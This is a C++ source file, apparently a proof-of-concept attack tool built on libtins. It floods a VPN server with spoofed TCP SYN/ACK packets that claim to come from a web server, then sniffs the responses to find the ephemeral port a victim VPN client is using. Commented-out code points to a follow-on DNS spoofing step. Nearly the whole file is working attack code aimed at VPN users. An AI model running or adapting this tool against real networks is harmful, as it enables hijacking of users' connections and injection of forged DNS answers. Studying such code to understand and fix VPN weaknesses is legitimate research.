You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

230 lines
5.2 KiB

  1. #include <tins/tins.h>
  2. #include <cassert>
  3. #include <iostream>
  4. #include <string>
  5. #include <unistd.h>
  6. #include <thread>
  7. using std::thread;
  8. using std::cout;
  9. using std::string;
  10. using std::vector;
  11. using namespace Tins;
  12. int current_spoof_port, best_port, chack_count;
  13. bool is_running = true;
  14. bool verbose = false;
  15. bool sniffed_resp = false;
  16. string dest_ip;
  17. string source_ip;
  18. void print_divider(int count) {
  19. int i = 0;
  20. while (i < count) {
  21. if (verbose) cout << "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
  22. i++;
  23. }
  24. }
  25. bool handle_send_packet(PDU &some_pdu) {
  26. const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
  27. if (ip.src_addr() == source_ip) {
  28. current_spoof_port = some_pdu.rfind_pdu<TCP>().dport();
  29. //cout << "Current Spoof Port (sniff) = " << current_spoof_port << "\n";
  30. }
  31. if (ip.src_addr() == dest_ip) {
  32. const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
  33. //cout << "Payload Size = " << payload << "\n";
  34. const int remainder = payload % 115;
  35. }
  36. return is_running;
  37. }
  38. bool handle_packet(PDU &some_pdu) {
  39. const IP &ip = some_pdu.rfind_pdu<IP>(); // Grab IP layer of sniffed packet
  40. // in this case we're looking for a packet from the vpn server to the vpn client
  41. //
  42. // the src ip should be the VPN server and dest ip should be
  43. // public address of victim
  44. if (ip.src_addr() == dest_ip) { // dest_ip should be public VPN IP
  45. const uint32_t& payload = some_pdu.rfind_pdu<RawPDU>().payload_size();
  46. //cout << "Payload size: " << payload << "\n";
  47. if (payload == 99) { // could be a NAT'ed attacker packet
  48. cout << "sniffed response from VPN server with port: " << current_spoof_port << " and size: " << payload << " \n";
  49. best_port = current_spoof_port;
  50. sniffed_resp = true;
  51. }
  52. }
  53. return is_running;
  54. }
  55. void sniff_stuff() {
  56. SnifferConfiguration config;
  57. config.set_promisc_mode(true);
  58. //config.set_filter("ip dst 10.0.0.215");
  59. // would want to filter out ssh stuff at some point
  60. Sniffer sniffer("any", config);
  61. sniffer.sniff_loop(handle_packet);
  62. }
  63. void sniff_send_stuff() {
  64. SnifferConfiguration config;
  65. config.set_promisc_mode(true);
  66. Sniffer sniffer("any", config);
  67. sniffer.sniff_loop(handle_send_packet);
  68. }
  69. // Spreads SYNs across the victim's entire port range
  70. // coming from a specific remote_ip:port
  71. //
  72. int phase_two_spread(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
  73. PacketSender sender;
  74. NetworkInterface iface("enp0s9");
  75. IP pkt = IP(dest_ip, source_ip) / TCP(40400, sport);
  76. TCP& tcp = pkt.rfind_pdu<TCP>();
  77. tcp.flags(TCP::SYN | TCP::ACK);
  78. int current_port = best_port;
  79. int count = 0;
  80. int i = start_port;
  81. bool found = false;
  82. while (i < end_port && !found) {
  83. tcp.dport(i);
  84. sender.send(pkt, iface);
  85. //cout << "Current port= " << i << "\n";
  86. usleep(500);
  87. count++;
  88. i ++;
  89. if (count % 50 == 0) {
  90. usleep(1000);
  91. cout << " Current port = " << i << ". Best port = " << best_port << ".\n";
  92. }
  93. if (best_port != 0) found = true;
  94. }
  95. usleep(1000000); // sleep to give victim time to respond w chack
  96. current_port = best_port;
  97. if (verbose) cout << "finished round 1 w guessed port: " << current_port << "\n";
  98. // In round 1 we spoofed really fast (10 sleep) to get a good estimate of the
  99. // port in use. Round 2, we spoof slower from about 50 packets back to account
  100. // for the delay in response and hopefully get the exact port number in use.
  101. print_divider(1);
  102. usleep(1000000 / 2);
  103. // sniffed_chack = false;
  104. int j = current_port - 300;
  105. found = false;
  106. best_port = 0;
  107. while (j < (current_port + 300) && !found) {
  108. tcp.dport(j); // set the packets dest port to current guess
  109. sender.send(pkt, iface);
  110. cout << "Current guess port = " << j << " and best port = " << best_port << " \n";
  111. usleep(10000);
  112. j ++;
  113. if (best_port != 0) found = true;
  114. }
  115. usleep(1000000);
  116. if (verbose) cout << "finished round 2 w guessed port: " << best_port << "\n";
  117. return best_port;
  118. }
  119. int find_port(string source_ip, int sport, string dest_ip, int start_port, int end_port) {
  120. bool is_found = false;
  121. int current_port = 0;
  122. while (!is_found) {
  123. current_port = phase_two_spread(source_ip, sport, dest_ip, start_port, end_port);
  124. print_divider(1);
  125. if (verbose) cout << "finished phase 2 w possible port: " << current_port << "\n";
  126. is_found = true;
  127. }
  128. return current_port;
  129. }
  130. int main(int argc, char** argv) {
  131. if (argc != 4) {
  132. cout << "sike wrong number of args ---> (source_ip, sport, dest_ip)\n";
  133. return 0;
  134. }
  135. source_ip = argv[1]; // web server IP
  136. int sport = atoi(argv[2]); // most likely 80 or 443
  137. dest_ip = argv[3]; // vpn server IP
  138. verbose = true;
  139. int start_port = 32768;
  140. int end_port = 61000;
  141. print_divider(2);
  142. thread sniff_thread(sniff_stuff);
  143. thread send_sniff_thread(sniff_send_stuff);
  144. int p = find_port(source_ip, sport, dest_ip, start_port, end_port);
  145. //cout << p << "\n";
  146. print_divider(1);
  147. //if (verbose) cout << "Completed phase 2 with port: " << p << "\n\n";
  148. //if (verbose) cout << "Attempting to spoof DNS back on port ..\n";
  149. //int res = spoof_dns(source_ip, sport, dest_ip, p);
  150. is_running = false;
  151. sniff_thread.join();
  152. send_sniff_thread.join();
  153. return p;
  154. }